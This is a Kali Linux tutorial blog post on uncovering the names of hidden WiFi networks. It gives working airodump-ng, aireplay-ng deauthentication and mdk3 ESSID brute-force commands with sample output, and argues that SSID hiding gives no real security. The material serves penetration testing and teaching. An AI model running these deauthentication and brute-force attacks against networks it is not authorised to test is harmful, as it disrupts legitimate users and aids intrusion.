• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
KaliTut

KaliTut

Kali Linux tutorial and Linux system tips

  • Home
  • Raspberry Pi
  • Privacy Policy
  • About us

How to find the name of the wifi hidden network

Last Updated on April 25, 2022 by Walid Salame Leave a Comment

What is hidden WiFi networks? wifi hidden network is configure to be hidden so they do not broadcast their name (ESSID). This is considered, in their opinion, additional protection (along with the password).

Simply put, the wifi hidden network is a network that is not visible in the list of available networks. To connect to it, you must enter its name manually.

In fact, this method of protection is untenable, if only because at certain moments the name of the wireless network (ESSID) is still broadcast in an open form.

There is a whole set of recommendations on how to protect your wireless router. But this type of protection (hiding the name of WiFi), as well as filtering by MAC address , are not recommended for use, because they cause certain difficulties to legitimate users and do not provide any protection.
This material shows the failure of protection by hiding the network.

How to find WiFi hidden networks

Let’s start with the fact that hidden networks are not so hidden. They are very easy to see with Airodump-ng . To do this we need Monitor Mode WiFi adapter , we translate our wireless card into monitor mode :

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

And run Airodump-ng:

airodump-ng wlan0

Pay attention to the line

20: 02: AF: 32: D2: 61 -40 108 3 0 6 54e WPA2 CCMP PSK  

This is the “hidden” WiFi network. All data, except for ESSID, is available on a par with other access points. And we already know something about the ESSID: <length: 3> . This means that the length of the name is 3 characters.

Getting the name of WiFi hidden network using Airodump-ng

The network name (ESSID) is transmitted in the broadcast in clear text and can be intercepted during client connection. You can wait for the client to connect in a natural way, or you can speed up the process if you “knock out” ( deauthenticate ) from the access point. After that, it will immediately begin to reconnect, the network name will appear in the broadcast in clear text, and we, in turn, will intercept it.
We look at the available access point:

airodump-ng wlan0mon

Network with a hidden name:

20:25:64:16:58:8C  -42     1856        0    0   1  54e  WPA2 CCMP   PSK  

the SSSID is 20: 25: 64: 16: 58: 8C, the length of the AP name is 11 characters, works on channel 1. Therefore, I run airodump-ng on the first channel:

airodump-ng wlan0 --channel 1

If you remember, when capturing the handshake, I also indicated the -w option followed by the file name prefix. This can be done now – since the seizure of a handshake does not prevent the identification of the name of the hidden AP. In this case, you will kill two birds with one stone at once.

You can do nothing – just wait for someone to connect or reconnect naturally. If you are in a hurry, you can force the process using de-authentication attacks.

To do this, we open a new terminal window and type the command there:

aireplay-ng -0 3 -a 20:25:64:16:58:8C wlan0

Here, -0 means deauthentication, 3 means the number of sent packets, -a 20: 25: 64: 16: 58: 8C is the BSSID of the target AP, and wlan0 is the network interface in monitor mode.
 The result was obtained almost instantly:

Line of interest:

20:25:64:16:58:8C  -34 100     1270      601    0   1  54e  WPA2 CCMP   PSK  SecondaryAP

Those. The name of the “hidden” network is SecondaryAP .

Advantages of using Airodump-ng:

  • Much faster than brute force with mdk3 (using de-authentication attack )
  • If you do not use deauthentication attack, then you remain invisible for wireless monitoring systems.

Cons using Airodump-ng:

  • If there are no clients, then this program is powerless to reveal the hidden WiFi network
  • If you use the attack deauthentication, then you are unmasking yourself.
  • If you do not use this attack, the disclosure time of the network name is greatly increased.

Getting the name of hidden WiFi network using mdk3

Advantages of using mdk3:

  • Works in situations where Airodump-ng is powerless.
  • find the name of the hidden WiFi without clients .

Cons of using mdk3:

  • The selection can be delayed for a long time, especially for long names of WiFi access points.
  • You always unmask yourself, your activity for wireless monitors looks extremely suspicious.

Remember our first hidden AP

20:02:AF:32:D2:61  -40      108        3    0   6  54e  WPA2 CCMP   PSK  

Unfortunately, this AP has no clients, so we cannot use the magic of Airodump-ng . Instead, we will use the mdk3 brute force.
My command has the form:

mdk3 wlan0 p -t 20:02:AF:32:D2:61 -f /root/essid.txt

Here mdk3 is the name of the tool we are using, wlan0 is the name of the wireless network interface, p means basic sounding and ESSID brute-force mode, -t 20: 02: AF: 32: D2: 61 is the BSSID of the TD we are interested in, -f / root / essid .txt points to a file that contains a list of names for the brute-force ESSID (WiFi network name). The result of the program:
The result of the program:

wifi hidden network

Those. The network name is matched, it turned out to be web . Above is a dictionary attack. But the names of wireless networks can be mined using the usual brute force. My command takes the form:

mdk3 wlan0 p -t 20:02:AF:32:D2:61 -с 6 -b l

Most of the options are already familiar to us, except for two new ones: -c 6 means the sixth channel, -bl means the character set, and l means lower case.
Character sets:

  • all printed ( a )
  • lower case ( l )
  • upper case ( u )
  • digits ( n )
  • lower and upper case ( c )
  • lower and upper case plus numbers ( m )
[email protected]:~# mdk3 wlan0 p -t 20:02:AF:32:D2:61 -с 6 -b l 
SSID Bruteforce Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
SSID is hidden. SSID Length is: 3.
Trying SSID:                             
Packets sent:      1 - Speed:    1 packets/sec
Got response from 0C:54:A5:C0:24:D6, SSID: "DANIELLE2015"
Last try was: aaa
Trying SSID: mla                                
Trying SSID: rab                                
Packets sent:    695 - Speed:  395 packets/sec
Got response from 20:02:AF:32:D2:61, SSID: "web"
Last try was: xeb

As you can see, the program just perfectly (and quickly!) Worked. Result received: Got response from 20: 02: AF: 32: D2: 61, SSID: “web” .

To summarize WiFi protection by hiding the name of the network (along with filtering by MAC address – see the article “ How to bypass filtering by MAC address ”) are unfit security tools. Nobody forbids their use – they do not weaken the protection. But they do not increase it. In this case, you have to put up with the inconveniences that they cause to legitimate users. If we are talking about filtering by MAC address, then if you add a new client, someone should receive administrative rights for the router and change its configuration. This may not always be acceptable.

If you know other programs or methods for obtaining the ESSID – the name of a hidden WiFi network, then you can share them in the comments.

Filed Under: WiFi Pentesting Tagged With: hidden WiFi networks

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Follow us

  • Facebook
  • Twitter
  • YouTube

Categories

  • Android pentesting tools
  • Arduino
  • Books
  • Darknet
  • database
  • General
  • Github Tools
  • Hacking
  • Kali Linux
  • Linux
  • Linux Commands
  • Network Administrator
  • Penetration Testing
  • Penetration Testing Tools
  • PowerShell
  • Raspberry Pi
  • resources
  • Review
  • Termux
  • Tutorials
  • Ubuntu
  • Uncategorized
  • Video Tutorials
  • vmware
  • WiFi Adapter
  • WiFi Pentesting
  • Wireless Router
  • Wireshark

Recent Posts

  • Hijacked Wi-Fi? Thorough explanation of hacking techniques
  • Windows PowerShell tutorial for beginners
  • Learn to Hack Steps from Beginner to Hacker
  • PowerShell Tutorial – GUIDE introduction with basics
  • Top Hacking Tools
  • Home
  • About us
  • Privacy Policy
  • Affiliate disclaimer

Copyright © 2023